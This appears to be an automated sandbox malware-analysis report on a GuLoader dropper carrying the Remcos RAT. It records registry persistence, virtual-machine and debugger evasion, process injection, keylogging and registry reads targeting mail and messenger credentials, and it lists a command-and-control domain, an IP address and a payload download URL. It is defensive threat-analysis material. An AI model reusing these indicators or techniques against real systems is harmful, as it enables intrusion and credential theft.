          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_0044DB70 push eax; ret
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_0044DB70 push eax; ret
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 21_1_00451D54 push eax; ret
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_00414060 push eax; ret
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_00414060 push eax; ret
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_00414039 push ecx; ret
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_004164EB push 0000006Ah; retf
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_00416553 push 0000006Ah; retf
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_00416555 push 0000006Ah; retf
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_00444355 push ecx; ret
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_004446D0 push eax; ret
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_004446D0 push eax; ret
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_00404C9D LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeFile created: C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.exeJump to dropped file

          Boot Survival:

          barindex
          Creates autostart registry keys with suspicious values (likely registry only malware)Show sources
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.vbsJump to behavior
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.vbsJump to behavior
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOMEJump to behavior
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOMEJump to behavior
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOMEJump to behavior
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOMEJump to behavior
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_004047C6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect Any.runShow sources
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeFile opened: C:\Program Files\qga\qga.exe
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: g4FtSOZMD9.exe, 00000009.00000002.620742317.0000000001AB0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=\RESTROKE.EXE\BREVSAMLINGSSTEDS8SET W = CREATEOBJECT("WSCRIPT.SHELL")
          Source: g4FtSOZMD9.exe, 00000000.00000002.471537036.0000000002B50000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000002.620742317.0000000001AB0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: g4FtSOZMD9.exe, 00000000.00000002.471537036.0000000002B50000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL\RESTROKE.EXE\BREVSAMLINGSSTEDS8SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCECHRYSOME
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe TID: 5760Thread sleep count: 543 > 30
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exe TID: 528Thread sleep time: -1800000s >= -30000s
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeThread delayed: delay time: 600000
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeWindow / User API: threadDelayed 543
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 23_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeThread delayed: delay time: 600000
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeSystem information queried: ModuleInformation
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: g4FtSOZMD9.exe, 00000009.00000002.620742317.0000000001AB0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=\Restroke.exe\Brevsamlingssteds8Set W = CreateObject("WScript.Shell")
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: g4FtSOZMD9.exe, 00000000.00000002.471537036.0000000002B50000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll\Restroke.exe\Brevsamlingssteds8Software\Microsoft\Windows\CurrentVersion\RunOnceCHRYSOME
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmpBinary or memory string: vmicvss
          Source: g4FtSOZMD9.exe, 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp, g4FtSOZMD9.exe, 00000009.00000002.620803230.0000000001BD7000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: bhvFAB7.tmp.21.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:BE8AB8DF-DCD1-3523-4A95-3A04EAFF1CBA&ctry=US&time=20220102T102601Z&lc=en-US&pl=en-US&idtp=mid&uid=b029da70-c67b-4a7e-9bd5-517f7e302ed9&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=93a49fdf6de24d87bd311ffc5aadad28&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1324233&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1324233&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
          Source: g4FtSOZMD9.exe, 00000000.00000002.471537036.0000000002B50000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000002.620742317.0000000001AB0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
          Source: g4FtSOZMD9.exe, 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW$

          Anti Debugging:

          barindex
          Hides threads from debuggersShow sources
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_00404C9D LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_0228CE02 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02289E52 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02295252 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02294BE5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_022920B6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_02292C8E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 0_2_022866C3 LdrInitializeThunk,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeMemory written: C:\Users\user\Desktop\g4FtSOZMD9.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeMemory written: C:\Users\user\Desktop\g4FtSOZMD9.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeMemory written: C:\Users\user\Desktop\g4FtSOZMD9.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess created: C:\Users\user\Desktop\g4FtSOZMD9.exe "C:\Users\user\Desktop\g4FtSOZMD9.exe"
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\iwxzjjveuvjtvtlo"
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\srdskbfyidbgfzzawoj"
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeProcess created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\vtilcuqzwmtlifvenyefmr"
          Source: g4FtSOZMD9.exeBinary or memory string: [2022/01/02 02:28:02 Offline Keylogger Started] [2022/01/02 02:28:02 Program Manager]
          Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000009.00000002.620897284.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605956778.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.582710276.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605645190.0000000001C78000.00000004.00000001.sdmpBinary or memory string: Program Manager
          Source: g4FtSOZMD9.exe, 00000009.00000002.621030433.00000000020B0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: g4FtSOZMD9.exe, 00000009.00000002.621030433.00000000020B0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: g4FtSOZMD9.exe, 00000009.00000003.605373507.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000002.620916811.0000000001C8A000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.582805331.0000000001C83000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605454693.0000000001C83000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.582710276.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605645190.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605678171.0000000001C83000.00000004.00000001.sdmpBinary or memory string: [2022/01/02 02:28:02 Program Manager]
          Source: g4FtSOZMD9.exe, 00000009.00000002.621030433.00000000020B0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
          Source: g4FtSOZMD9.exe, 00000009.00000003.605373507.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000002.620897284.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605956778.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.582710276.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605645190.0000000001C78000.00000004.00000001.sdmpBinary or memory string: Program Manager5
          Source: g4FtSOZMD9.exe, 00000009.00000002.621030433.00000000020B0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: g4FtSOZMD9.exe, 00000009.00000003.582710276.0000000001C78000.00000004.00000001.sdmpBinary or memory string: |Program Manager|
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_00406B06 GetVersionExA,
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: 22_2_00407C79 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

          Stealing of Sensitive Information:

          barindex
          Yara detected Remcos RATShow sources
          Source: Yara matchFile source: 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: g4FtSOZMD9.exe PID: 5452, type: MEMORYSTR
          GuLoader behavior detectedShow sources
          Source: Initial fileSignature Results: GuLoader behavior
          Tries to steal Mail credentials (via file / registry access)Show sources
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          Tries to steal Mail credentials (via file registry)Show sources
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: ESMTPPassword
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword
          Yara detected WebBrowserPassView password recovery toolShow sources
          Source: Yara matchFile source: Process Memory Space: g4FtSOZMD9.exe PID: 5524, type: MEMORYSTR
          Tries to steal Instant Messenger accounts or passwordsShow sources
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\Desktop\g4FtSOZMD9.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt

          Remote Access Functionality:

          barindex
          Yara detected Remcos RATShow sources
          Source: Yara matchFile source: 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: g4FtSOZMD9.exe PID: 5452, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1Input Capture11Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder11Access Token Manipulation1Obfuscated Files or Information2Credentials in Registry2File and Directory Discovery1Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Process Injection112Software Packing11Credentials In Files1System Information Discovery16SMB/Windows Admin SharesInput Capture11Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder11Masquerading1NTDSSecurity Software Discovery41Distributed Component Object ModelClipboard Data1Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion221LSA SecretsProcess Discovery3SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol112Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsVirtualization/Sandbox Evasion221VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 547022 Sample: g4FtSOZMD9 Startdate: 02/01/2022 Architecture: WINDOWS Score: 100 32 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->32 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 12 other signatures 2->38 7 g4FtSOZMD9.exe 1 2 2->7         started        process3 signatures4 40 Detected unpacking (changes PE section rights) 7->40 42 Tries to steal Mail credentials (via file registry) 7->42 44 Creates autostart registry keys with suspicious values (likely registry only malware) 7->44 46 2 other signatures 7->46 10 g4FtSOZMD9.exe 3 29 7->10         started        process5 dnsIp6 28 147.189.137.168, 49835, 80 JANETJiscServicesLimitedGB United Kingdom 10->28 30 nhtaxfilling.ddnsgeek.com 207.32.218.236, 49836, 49837, 49843 1GSERVERSUS United States 10->30 24 C:\Users\user\AppData\Local\...\Restroke.exe, PE32 10->24 dropped 26 C:\Users\user\AppData\Local\...\Restroke.vbs, ASCII 10->26 dropped 48 Tries to detect Any.run 10->48 50 Hides threads from debuggers 10->50 52 Installs a global keyboard hook 10->52 54 Injects a PE file into a foreign processes 10->54 15 g4FtSOZMD9.exe 1 10->15         started        18 g4FtSOZMD9.exe 1 10->18         started        20 g4FtSOZMD9.exe 1 10->20         started        22 svchost.exe 10->22         started        file7 signatures8 process9 signatures10 56 Tries to steal Instant Messenger accounts or passwords 15->56 58 Tries to steal Mail credentials (via file / registry access) 15->58

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          g4FtSOZMD9.exe22%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.exe16%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          9.0.g4FtSOZMD9.exe.400000.2.unpack100%AviraTR/Dropper.VB.GenDownload File
          0.0.g4FtSOZMD9.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
          21.0.g4FtSOZMD9.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
          23.2.g4FtSOZMD9.exe.400000.0.unpack100%AviraHEUR/AGEN.1116590Download File
          9.0.g4FtSOZMD9.exe.400000.3.unpack100%AviraTR/Dropper.VB.GenDownload File
          22.2.g4FtSOZMD9.exe.400000.0.unpack100%AviraHEUR/AGEN.1116590Download File
          22.0.g4FtSOZMD9.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
          9.0.g4FtSOZMD9.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
          0.2.g4FtSOZMD9.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
          9.0.g4FtSOZMD9.exe.400000.1.unpack100%AviraTR/Dropper.VB.GenDownload File
          23.0.g4FtSOZMD9.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.imvu.comr0%URL Reputationsafe
          https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
          https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js0%URL Reputationsafe
          http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijk4OGQ1ZDgwMWE2ODQ2NDNkM2ZkMmYyMGEwOTgwMWQ3MDE2Z0%Avira URL Cloudsafe
          http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
          https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
          http://images.outbrainimg.com/transform/v3/eyJpdSI6ImQ1Y2M3ZjUxNTk0ZjI1ZWI5NjQxNjllMjcxMDliYzA5MWY4N0%Avira URL Cloudsafe
          http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
          https://pki.goog/repository/00%URL Reputationsafe
          https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=10%URL Reputationsafe
          nhtaxfilling.ddnsgeek.com0%Avira URL Cloudsafe
          https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js0%URL Reputationsafe
          http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
          http://pki.goog/gsr2/GTSGIAG3.crt0)0%URL Reputationsafe
          http://ns.adobe.c/g?0%Avira URL Cloudsafe
          http://pki.goog/gsr2/GTS1O1.crt0#0%URL Reputationsafe
          http://147.189.137.168/1040_RyQoPlW98.bin0%Avira URL Cloudsafe
          http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
          http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL0%URL Reputationsafe
          http://147.189.137.168/1040_RyQoPlW98.bin~:0%Avira URL Cloudsafe
